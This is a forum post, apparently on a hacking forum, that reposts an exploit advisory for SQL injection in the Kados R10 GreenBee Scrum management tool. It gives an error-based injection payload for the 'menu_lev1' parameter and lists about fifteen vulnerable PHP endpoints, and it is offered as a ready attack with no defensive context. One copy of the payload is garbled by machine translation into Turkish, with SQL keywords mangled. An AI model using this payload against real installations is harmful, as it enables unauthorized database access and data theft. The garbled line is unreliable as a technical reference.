Kados R10 GreenBee - Multiple SQL Vuln.
by storix - 05-30-2019, 10:38 PM
#1
===========================================================================================
# Exploit Title: Kados R10 GreenBee - ‘menu_lev1‘ SQL Injection
# Dork: N/A
# Date: 06-03-2019
# Exploit Author: Kybre
# Vendor Homepage: https://www.kados.info/
# Software Link: https://sourceforge.net/projects/kados/
# Version: R10 GreenBee
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Descr*iption: KADOS (KAnban Dashboard for Online Scrum) is a web-based tool for managing Scrum projects.
===========================================================================================
# POC - SQLi
# Parameters : menu_lev1
# Attack Pattern : -1%27%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27 
? # GET Yöntem: http: //localhost/kados_r10/kados/projects.php menu_lev1 = -1' + (1 ziyaretinde SIRA (1,1) GT (SELECT COUNT (*), CONCAT (CHAR (95), CHAR (33 OLUP, CHAR (105), CHAR (108), CHAR (101), CHAR (109), CHAR (109), CHAR (97)), CHAR (64), CHAR (52), CHAR (100) olup, YER 0x3a (RAND (0) x 2)) İLE INFORMATION_SCHEMA.COLLATIONS grubu x)) +', x 
# Http: //localhost/kados_r10/kados/administration/languages.php menu_lev1 =% 27 [SQL enjekte İşte] 
# Http: //localhost/kados_r10/kados/administration/news.php menu_lev1 =% 27 [SQL enjekte İşte] 
# Http: //localhost/kados_r10/kados/administration/parameters.php menu_lev1 =% 27 [SQL enjekte İşte]
# Http: //localhost/kados_r10/kados/administration/profiles.php menu_lev1 =% 27 [SQL enjekte İşte]
# Http: //localhost/kados_r10/kados/administration/users.php menu_lev1 =% 27 [SQL enjekte İşte]
# Http: //localhost/kados_r10/kados/app_admin/app_columns.php menu_lev1 =% 27 [SQL enjekte İşte]
# Http: //localhost/kados_r10/kados/app_admin/external_connections.php menu_lev1 =% 27 [SQL enjekte İşte] 
# Http: //localhost/kados_r10/kados/app_admin/template_tags.php menu_lev1 =% 27 [SQL enjekte İşte]
# Http: //localhost/kados_r10/kados/app_admin/template_tags_groups.php menu_lev1 =% 27 [SQL enjekte İşte]
# Http: //localhost/kados_r10/kados/app_admin/templates_project.php menu_lev1 =% 27 [SQL enjekte İşte]
# Http: //localhost/kados_r10/kados/my_profile.php menu_lev1 =% 27 [SQL enjekte İşte] 
# Http: //localhost/kados_r10/kados/my_profile_password.php menu_lev1 =% 27 [SQL enjekte İşte]
# Http: //localhost/kados_r10/kados/template_checklist.php menu_lev1 =% 27 [SQL enjekte İşte]

# exploit-db.com : https://www.exploit-db.com/exploits/46505
===========================================================================================
Reply

Possibly Related Threads…
Thread Author Replies Views Last Post
Newsbull Haber Script XSS Vuln. Adient 0 147 05-30-2019, 10:55 PM
Last Post: Adient
Rukovoditel PRM-CRM 2.4.1 SQL Vuln. Adient 0 104 05-30-2019, 10:54 PM
Last Post: Adient
Rukovoditel PRM-CRM 2.4.1 SQL Vuln. Adient 0 82 05-30-2019, 10:52 PM
Last Post: Adient

 Users browsing this thread: 1 Guest(s)